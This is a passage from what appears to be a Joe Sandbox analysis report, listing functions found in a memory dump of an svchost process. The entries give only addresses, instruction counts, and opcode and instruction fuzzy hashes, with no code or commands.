                                                                                            • Opcode Fuzzy Hash: 151fa3eda0d68173f6b84e2a92513b46d7512e2f74e79334ea38076815889cea
                                                                                            • Instruction Fuzzy Hash: 7FE09276210200BFE764DB58CE49FE673ECEB40720F140269B119971D0DBB0BE40CB60
                                                                                            Function 03AB4000 Relevance: .0, Instructions: 22COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                            • Instruction ID: 77d2075e9afeeef6d68ab2e0df54db4a0504bb3a213196d68c54f1e257b2ccc7
                                                                                            • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                            • Instruction Fuzzy Hash: 89E052753003459FD715CF1AC054BA6B7BABFD9A50F28C069A8488F206EB36E942DB51
                                                                                            Function 03AEB3D0 Relevance: .0, Instructions: 21COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                            • Instruction ID: bebb8406a9526c31a1da8972a3d9af41289572bbd4e274aa09faba94afa07283
                                                                                            • Opcode Fuzzy Hash: 2862d5c95079e8f9bdfc17701203be164f113e2c7109adcb0461f4fb661a1a8a
                                                                                            • Instruction Fuzzy Hash: 3EE0CD35244314B7DB22AB44CD04F697B15DB507E0F104033FA085EB90C5B19C51D6D4
                                                                                            Function 03A2823B Relevance: .0, Instructions: 21COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                            • Instruction ID: 6df77792f9dd573587d72fd9da3d0319bce509369d3a577792f4e907219690ea
                                                                                            • Opcode Fuzzy Hash: 2b708af5a461c1f99ac8d3b2cba32ed51933f6cdd1bf79975374bbcdf42faac7
                                                                                            • Instruction Fuzzy Hash: 7CE08C35101A20EEDB35FF19DE04B527AA9FB84B10F14486BF0820A5A487B8A891DB54
                                                                                            Function 03AB92BC Relevance: .0, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c95800db9e9f72fed0cc7f01bdcde1f15b9c4fb4cf88abc721372dced68286a1
                                                                                            • Instruction ID: 1200c969e43a5743e8d64b2310c09a40d4fd98969fbbf5507d2f6ab88761736d
                                                                                            • Opcode Fuzzy Hash: c95800db9e9f72fed0cc7f01bdcde1f15b9c4fb4cf88abc721372dced68286a1
                                                                                            • Instruction Fuzzy Hash: 0EF0ED34651B84CFE72ADF04C1E1B5273BDF755B44F50055DD4464BFA2C73A9941CA40
                                                                                            Function 03A32050 Relevance: .0, Instructions: 20COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 54894a372e807c2b5fb1d07b876bc0dc0cb3b510034075ec717764bb77085704
                                                                                            • Instruction ID: 601dad5c80c12617f5d4743ce3e23024aaa2b594b4ad4ab87c3519fc28093661
                                                                                            • Opcode Fuzzy Hash: 54894a372e807c2b5fb1d07b876bc0dc0cb3b510034075ec717764bb77085704
                                                                                            • Instruction Fuzzy Hash: 4DE0C2322006506BC722FF5DEE00F8A739EEFA5360F004222F1508B7D0CB64AC00C794
                                                                                            Function 03A2A0E3 Relevance: .0, Instructions: 15COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                            • Instruction ID: 5ca58db2cdc55280e822d0ef860c04dbec8a2b73236f7070fd50ea0e26cf28eb
                                                                                            • Opcode Fuzzy Hash: c1fe28d2b99599f70fe9b16ebd98ffdfbd128d642cd65cc2bf81b3ea4870f6a7
                                                                                            • Instruction Fuzzy Hash: 1ED0123631617097CF29E7596914F67AD159BC1AA4F1A006E780AD7940C9158C42D6E0
                                                                                            Function 03A402A0 Relevance: .0, Instructions: 13COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                            • Instruction ID: 880e27663e21d8a20c9055a319c5d6904da45485ca8a29adbb4b079c6035c6ac
                                                                                            • Opcode Fuzzy Hash: 153dea5617c300a23885095067624b68861a72d9651cf20dee72da6dc6a95444
                                                                                            • Instruction Fuzzy Hash: 4DD0C935212E80CFDA1ACF0DC5A4B16B3B8BB84B44F8504D6E641CBB61D66CD940CE00
                                                                                            Function 03AB930B Relevance: .0, Instructions: 12COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                            • Instruction ID: 632d3b0d76bb7d08aee6107e8458d0d5c7023bb214be5985c1e856d51f911031
                                                                                            • Opcode Fuzzy Hash: 73b68ca8792e09d39eb84bf204166a27678a7482029cab1375adc9e7cd32c121
                                                                                            • Instruction Fuzzy Hash: 43D01735945AC48FE727CB08C165B917BF8F705B40F89009DE04247AA2C37C9984CB10
                                                                                            Function 03A6C700 Relevance: .0, Instructions: 12COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                            • Instruction ID: 0c8f2f15a9ff17853e7808da0b1fe326ad6be17876a823b7d93c5f23639fae69
                                                                                            • Opcode Fuzzy Hash: a4bbd7c5c996c6314633515492723e329d7ccf5f4dcb798370ffde6045762c53
                                                                                            • Instruction Fuzzy Hash: A8C01236250644AFC711EA94CD01F0177A9E798B40F004021F2044B670C571E820D644
                                                                                            Function 03A50310 Relevance: .0, Instructions: 11COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                            • Instruction ID: 95bff0504406cec5cc201f72e0cf991c6552edae0daec6b6adc423965ac4311d
                                                                                            • Opcode Fuzzy Hash: b20a69916aee968c3675073d0381efa581de60bf3984a7ac555cf611b84c4bee
                                                                                            • Instruction Fuzzy Hash: 7ED01236100248EFCB01DF41D990D9A772AFBD8710F149019FD190B7108A31ED62DA50
                                                                                            Function 03A30750 Relevance: .0, Instructions: 9COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                            • Instruction ID: 54cf3c959cba6ba43dd42daf1549acb4edaae4b9eb13ace2f51034a607eecbb7
                                                                                            • Opcode Fuzzy Hash: 8541d5aa43a0a658d79fe6471d8132b1696e53b2ec5469e0c5791f15c56add93
                                                                                            • Instruction Fuzzy Hash: A5C048B9B01A41CFCF15EB2AD398F4977E8FB84740F1948D1E805CBB21E624E811CA10
                                                                                            Function 03A74340 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 68c526662f9eaac2dc143cb60ac73e07b925d6bfbb7f06ab4b7d19c33b5057f9
                                                                                            • Instruction ID: 4f5b4623c9dff27b171f5295851ec73d05e3a1f9d48205e9d262bdda1c1e9b40
                                                                                            • Opcode Fuzzy Hash: 68c526662f9eaac2dc143cb60ac73e07b925d6bfbb7f06ab4b7d19c33b5057f9
                                                                                            • Instruction Fuzzy Hash: 56900231605804129140B25848C4586800A97E0301B96C012E0424558C8F188A565371
                                                                                            Function 03A73090 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 39a5df7367ab553756e9914722894eb56deb5e3fa822f085525e943d64cddd48
                                                                                            • Instruction ID: 1d54d1d9bd09668607714e1ffd1c9049cf6b1357f8c7e39cd06b43f6e8a6e90e
                                                                                            • Opcode Fuzzy Hash: 39a5df7367ab553756e9914722894eb56deb5e3fa822f085525e943d64cddd48
                                                                                            • Instruction Fuzzy Hash: FA90022124140C02D140B2588454747400BC7D0701F96C012A0024558D8B1A8A6566B1
                                                                                            Function 03A73010 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7ce61163c570eb71effab79aca9290af278e8b1b65eb8bf01d7185b76370a12a
                                                                                            • Instruction ID: a9f046f472ae041aa9ab1269dc12bb4c1ca045a3c2b9b053e93a73cc8fea41fe
                                                                                            • Opcode Fuzzy Hash: 7ce61163c570eb71effab79aca9290af278e8b1b65eb8bf01d7185b76370a12a
                                                                                            • Instruction Fuzzy Hash: CB90022120184842D140B3584844B4F810A87E1302FD6C01AA4156558CCE1989555731
                                                                                            Function 03A74650 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7a53c565c7e2089dbd264bf25a15b57c5dae226d02f09b87817634c432705d30
                                                                                            • Instruction ID: 9b6c94d190057ec0c99f38a1ffbe42ed098602b745881b9a3c029e2c805014b7
                                                                                            • Opcode Fuzzy Hash: 7a53c565c7e2089dbd264bf25a15b57c5dae226d02f09b87817634c432705d30
                                                                                            • Instruction Fuzzy Hash: D5900261601504424140B2584844446A00A97E13013D6C116A0554564C8B1C89559279
                                                                                            Function 03A72BA0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8d20371795200f7d6214868c544299361f11c4b1892bb3189543ee8c8c91eccf
                                                                                            • Instruction ID: bd5aec11f7a917f59858093a662180b6b57f313dec5733e9e4d6197ace2d1c29
                                                                                            • Opcode Fuzzy Hash: 8d20371795200f7d6214868c544299361f11c4b1892bb3189543ee8c8c91eccf
                                                                                            • Instruction Fuzzy Hash: 8F90023160540C02D150B2584454786400A87D0301F96C012A0024658D8B598B5576B1
                                                                                            Function 03A72B80 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1981b2a18ec334b45b6691ae50d0b5dd9f5ef5ef4770d89bd83fdb9a71b7165a
                                                                                            • Instruction ID: 9f0212bf7eaeeebf89fe636263a96049ff3b913ef59b41b21d89ae7b387dfc7a
                                                                                            • Opcode Fuzzy Hash: 1981b2a18ec334b45b6691ae50d0b5dd9f5ef5ef4770d89bd83fdb9a71b7165a
                                                                                            • Instruction Fuzzy Hash: DC90023120140C02D104B25848446C6400A87D0301F96C012A6024659E9B6989917131
                                                                                            Function 03A72BE0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 80cbff06bf80c0e2aa0fb2f0763fea77ec6522d48615e2989a6f35af46e81d6a
                                                                                            • Instruction ID: 99f1909509e894226c65ffe029000fa59f8593dff52a4795a55c379d7f220421
                                                                                            • Opcode Fuzzy Hash: 80cbff06bf80c0e2aa0fb2f0763fea77ec6522d48615e2989a6f35af46e81d6a
                                                                                            • Instruction Fuzzy Hash: F990023120544C42D140B2584444A86401A87D0305F96C012A0064698D9B298E55B671
                                                                                            Function 03A72BF0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 4092c4c0539e6af747af659d731272539888c7c5ab560a979c00cb38991e8eda
                                                                                            • Instruction ID: 2b52c13725e8dd7f0cd6669340a04226487b6a364c2a99490ef91d9da8a08125
                                                                                            • Opcode Fuzzy Hash: 4092c4c0539e6af747af659d731272539888c7c5ab560a979c00cb38991e8eda
                                                                                            • Instruction Fuzzy Hash: 4190023120140C02D180B258444468A400A87D1301FD6C016A0025658DCF198B5977B1
                                                                                            Function 03A72AB0 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 52888675d200e506bc2b322d23e9808c2cc9c5044c8c63cb38af478ad7a2b7b7
                                                                                            • Instruction ID: 49060d19ecef0a5904bf1671d538003d4a171ee58bfddd45c12a31b441553543
                                                                                            • Opcode Fuzzy Hash: 52888675d200e506bc2b322d23e9808c2cc9c5044c8c63cb38af478ad7a2b7b7
                                                                                            • Instruction Fuzzy Hash: D79002A1201544924500F3588444B4A850A87E0301B96C017E1054564CCA2989519135
                                                                                            Function 03A72AF0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 47f35ad641ac83e2186a6eb4d232ee54244e75c1077c22e31e6da9ea883eb012
                                                                                            • Instruction ID: a5223688f6abb881e12cf11eaba9a95051dd7c49413644d08c58e0321b2e575e
                                                                                            • Opcode Fuzzy Hash: 47f35ad641ac83e2186a6eb4d232ee54244e75c1077c22e31e6da9ea883eb012
                                                                                            • Instruction Fuzzy Hash: EE900225221404020145F658064454B444A97D63513D6C016F1416594CCB2589655331
                                                                                            Function 03A72AD0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e6902ab728e85863d3f4bda96277ad561ed39ac51406dcff81c3992767dc2b68
                                                                                            • Instruction ID: 59f9088fff3487e3ea323a96c53c24ff27f134106eddd6390f43d77e3a418e95
                                                                                            • Opcode Fuzzy Hash: e6902ab728e85863d3f4bda96277ad561ed39ac51406dcff81c3992767dc2b68
                                                                                            • Instruction Fuzzy Hash: 4B900435311404030105F75C0744547404FC7D53513D7C033F1015554CDF35CD715131
                                                                                            Function 03A739B0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: cf369254d1442b133412931394f5493e607a14cd8e11e3d0028d41554af0dd56
                                                                                            • Instruction ID: 7e3f6e138cf15bcf951c92bf1d94aae68fc09b48b1a9639f62d079b5cdaa2739
                                                                                            • Opcode Fuzzy Hash: cf369254d1442b133412931394f5493e607a14cd8e11e3d0028d41554af0dd56
                                                                                            • Instruction Fuzzy Hash: BD90022124545502D150B25C4444656800AA7E0301F96C022A0814598D8A5989556231
                                                                                            Function 03A72FA0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a7b9f996df2abde099f42cfc5af05c71f0c0d7132c79f02fb958c1306fc47d1c
                                                                                            • Instruction ID: 862c9a2c29e6b4f4d9be7dafc4b8161a4e5858567f33c7d16480529c7f84f6cf
                                                                                            • Opcode Fuzzy Hash: a7b9f996df2abde099f42cfc5af05c71f0c0d7132c79f02fb958c1306fc47d1c
                                                                                            • Instruction Fuzzy Hash: 5290023120180802D100B2584848787400A87D0302F96C012A5164559E8B69C9916531
                                                                                            Function 03A72FB0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1600046cbbb195b19ec7098c4622af91ab2dc97aa8f6916553bdbe82b1702426
                                                                                            • Instruction ID: f395d6521db4a6659c57406cb5216dcf6c434b789d4011497581894ad8c81e27
                                                                                            • Opcode Fuzzy Hash: 1600046cbbb195b19ec7098c4622af91ab2dc97aa8f6916553bdbe82b1702426
                                                                                            • Instruction Fuzzy Hash: E3900221601404424140B2688884946800AABE1311796C122A0998554D8A5D89655675
                                                                                            Function 03A72F90 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8679b508a523df612dbdc91b9e802291fba349013447b279d6aaaedfadb40da0
                                                                                            • Instruction ID: 85e24c5b67aef11bc723c4417f91d54dec2a8bee427fcca3f63a43713e790caa
                                                                                            • Opcode Fuzzy Hash: 8679b508a523df612dbdc91b9e802291fba349013447b279d6aaaedfadb40da0
                                                                                            • Instruction Fuzzy Hash: 9A90023120180802D100B258485474B400A87D0302F96C012A1164559D8B2989516571
                                                                                            Function 03A72FE0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 19ed4ca94fbcb0ce4136e1c08095813115e6bbc47b29a5353b9d79ee7366c560
                                                                                            • Instruction ID: 269aa5b9903bf4c6c8ee247f90942a250528b3b8f4b6f402b25910e3670f4eb2
                                                                                            • Opcode Fuzzy Hash: 19ed4ca94fbcb0ce4136e1c08095813115e6bbc47b29a5353b9d79ee7366c560
                                                                                            • Instruction Fuzzy Hash: F4900221211C0442D200B6684C54B47400A87D0303F96C116A0154558CCE1989615531
                                                                                            Function 03A72F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2e6367d51e3f464020c64b0e0342dd17d4ce4b7d184fa149db916abad78e5668
                                                                                            • Instruction ID: 7e5bb11c719795e81707f8a49892f40e9e9ba9841dca345d0b2f30796632da34
                                                                                            • Opcode Fuzzy Hash: 2e6367d51e3f464020c64b0e0342dd17d4ce4b7d184fa149db916abad78e5668
                                                                                            • Instruction Fuzzy Hash: E990026134140842D100B2584454B46400AC7E1301F96C016E1064558D8B1DCD526136
                                                                                            Function 03A72F60 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9b625b05b53d64212807664abcda754801856069ec9c70f1cbae2cc81bde0342
                                                                                            • Instruction ID: d8c1f408ebad77ecb54ddd81f3f78bc7baf83078ee147537737722d54d015f8d
                                                                                            • Opcode Fuzzy Hash: 9b625b05b53d64212807664abcda754801856069ec9c70f1cbae2cc81bde0342
                                                                                            • Instruction Fuzzy Hash: 9390026121140442D104B2584444746404A87E1301F96C013A2154558CCA2D8D615135
                                                                                            Function 03A72EA0 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 8b7fe70b6d7b1db1a1db442cb7230ac382e9fb1f15c8df4b983fd3b836789434
                                                                                            • Instruction ID: e8a50da451d5a3d606a2b96a9272713038d03c5b8b2a4a6807586778a7e61d52
                                                                                            • Opcode Fuzzy Hash: 8b7fe70b6d7b1db1a1db442cb7230ac382e9fb1f15c8df4b983fd3b836789434
                                                                                            • Instruction Fuzzy Hash: 0590027120140802D140B2584444786400A87D0301F96C012A5064558E8B5D8ED56675
                                                                                            Function 03A72E80 Relevance: .0, Instructions: 4COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000002.00000002.2343632183.0000000003A00000.00000040.00001000.00020000.00000000.sdmp, Offset: 03A00000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_2_2_3a00000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
